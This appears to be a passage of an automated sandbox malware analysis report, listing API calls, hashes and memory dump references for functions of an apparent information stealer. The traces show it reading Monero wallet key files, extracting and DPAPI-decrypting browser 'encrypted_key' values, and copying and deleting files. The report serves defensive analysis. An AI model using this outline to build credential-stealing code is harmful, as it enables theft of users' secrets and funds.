                  • Instruction ID: 1bf1f2b5707d121c71444e8a099a66b9f91e8ad2bb416d532833d15c6c44f9a1
                  • Opcode Fuzzy Hash: f7a958e709a273b8eb8d9ccbafd7529b6121c4fa65df8eab07aec23776816cb8
                  • Instruction Fuzzy Hash: 76011A75600108FFCB04DFECC998EAE7BB9FB58354F148648F9199B216CA31AE41DB91
                  Function 008712A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008712B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 008712BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008712D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008712F5
                  • RegCloseKey.ADVAPI32(?), ref: 008712FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: e9a779b8818c34731184ae0906908bc695d19e4c5dcb2b65eb3d1e08afc15e1d
                  • Instruction ID: 65482d72b8fde94626695ab77c30450dd2d6456a1f04d41f7aba613daa01766e
                  • Opcode Fuzzy Hash: e9a779b8818c34731184ae0906908bc695d19e4c5dcb2b65eb3d1e08afc15e1d
                  • Instruction Fuzzy Hash: 310131B9A40208BFDB00DFE4DC49FAEB7BCEB58701F008259FA05D7291DA719A418F51
                  Function 00886630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00886663
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00886726
                  • ExitProcess.KERNEL32 ref: 00886755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 86deb82c0465a29b2ce44f6425063ada73aaee4276784ba8aa87bd1358605141
                  • Instruction ID: 0e6e5b0a0fefb45455e3374831d9cd3b0b8ef59d100c779e0ea7196cd8bb2050
                  • Opcode Fuzzy Hash: 86deb82c0465a29b2ce44f6425063ada73aaee4276784ba8aa87bd1358605141
                  • Instruction Fuzzy Hash: 23312DB1801218AADB18FB94DC91BDD7B78FF14300F804199F205A61A2DF746B49CF67
                  Function 008887C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00890E28,00000000,?), ref: 0088882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00888836
                  • wsprintfA.USER32 ref: 00888850
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 326f07caba91dba5b27053a9a754486bd771981d32952cbb2676806ae5686946
                  • Instruction ID: 9c9f7ae8be046c78a812e0c02887c2a63c8a461928e8b4bbec7fd40de5e28c3a
                  • Opcode Fuzzy Hash: 326f07caba91dba5b27053a9a754486bd771981d32952cbb2676806ae5686946
                  • Instruction Fuzzy Hash: 182100B1A44208AFDB04DFD4DD45FAEBBB8FB48711F104219F605E7691C77999018BA1
                  Function 00888D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0088951E,00000000), ref: 00888D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00888D62
                  • wsprintfW.USER32 ref: 00888D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 16b6fa579726a0678a496e5d79fe85a1b1584f75ae049875b00aa6f558590754
                  • Instruction ID: c920088fc10b06cf8faf27581b1c62a06b889d632b1026b522fb42d33e531ab8
                  • Opcode Fuzzy Hash: 16b6fa579726a0678a496e5d79fe85a1b1584f75ae049875b00aa6f558590754
                  • Instruction Fuzzy Hash: 05E08CB1A44208BFCB00DFD4DC0EE6977BCEB04702F000294FD09D7691EA719E018B92
                  Function 0087A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0087A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 0087A3FF
                  • lstrlen.KERNEL32(00000000), ref: 0087A6BC
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 0087A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: a5f7e7f1c10307dba3029d786fec0d80f56068e437e2094bf6ed986a7078c9ec
                  • Instruction ID: 698506ba26990dfa09f65bba317e54f822f209c16f6889bca3138c1827486fe5
                  • Opcode Fuzzy Hash: a5f7e7f1c10307dba3029d786fec0d80f56068e437e2094bf6ed986a7078c9ec
                  • Instruction Fuzzy Hash: 14E18D728101189AEB09FBA8DD95DEE7338FF54300F50816AF516B60D1EE386A49CB73
                  Function 0087D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0087D481
                  • lstrlen.KERNEL32(00000000), ref: 0087D698
                  • lstrlen.KERNEL32(00000000), ref: 0087D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 0087D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 408fff2a0d7f1e433959f2d25e1fd16f0d526c46640948833fd74f337c0a570a
                  • Instruction ID: 328387693ef40873cc011b06a2598a9be02ff6b8bb65555da88c6e44a0a33738
                  • Opcode Fuzzy Hash: 408fff2a0d7f1e433959f2d25e1fd16f0d526c46640948833fd74f337c0a570a
                  • Instruction Fuzzy Hash: B391AE729101149AEB08FBA8DD969EE7738FF54300F50416AF516E60D2EF386A49CB63
                  Function 0087D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0087D801
                  • lstrlen.KERNEL32(00000000), ref: 0087D99F
                  • lstrlen.KERNEL32(00000000), ref: 0087D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 0087DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: f31f588e788cf0f62e09aebd580d6aa737461cdac4861869cec050b8887f63c8
                  • Instruction ID: 09fcaefff35a94f5064fb24ddd0edfacd3503754b87e04cfe89bb240581d773d
                  • Opcode Fuzzy Hash: f31f588e788cf0f62e09aebd580d6aa737461cdac4861869cec050b8887f63c8
                  • Instruction Fuzzy Hash: BF81CE719101149AEB08FBA8DD96DEE7738FF54300F50456AF516E60E2EF386A09CB63
                  Function 00883560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 408cedd754dc3021cc14a3fd22865a6c0c245190b6d8a861c090e0dbe3df7f08
                  • Instruction ID: 7616f12b8791aa2b476a68452afb46f9de8d3a82e72c203994f7ea152ef523bb
                  • Opcode Fuzzy Hash: 408cedd754dc3021cc14a3fd22865a6c0c245190b6d8a861c090e0dbe3df7f08
                  • Instruction Fuzzy Hash: 03414171D10109AFDB08FFE8D885AEE7774FF54704F048419E411A6291EB346A05DFA2
                  Function 00879CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 008799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                    • Part of subcall function 008799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                    • Part of subcall function 008799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                    • Part of subcall function 008799C0: ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                    • Part of subcall function 008799C0: LocalFree.KERNEL32(0087148F), ref: 00879A90
                    • Part of subcall function 008799C0: CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                    • Part of subcall function 00888E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00888E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00879D39
                    • Part of subcall function 00879AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879AEF
                    • Part of subcall function 00879AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00874EEE,00000000,?), ref: 00879B01
                    • Part of subcall function 00879AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879B2A
                    • Part of subcall function 00879AC0: LocalFree.KERNEL32(?,?,?,?,00874EEE,00000000,?), ref: 00879B3F
                    • Part of subcall function 00879B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00879B84
                    • Part of subcall function 00879B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00879BA3
                    • Part of subcall function 00879B60: LocalFree.KERNEL32(?), ref: 00879BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: d8579b5a04a46ef71217583e611ba834529920275907eb69d3a6dffa57e7f7ae
                  • Instruction ID: b69195e3b906309bffdf7d2c29273758818b486771662e26b8ff4cbfc3d361af
                  • Opcode Fuzzy Hash: d8579b5a04a46ef71217583e611ba834529920275907eb69d3a6dffa57e7f7ae
                  • Instruction Fuzzy Hash: BA313275D10109ABCF14EBE8DC85AEEB7B8FB48304F148519E915E7245FB34DA04CBA1
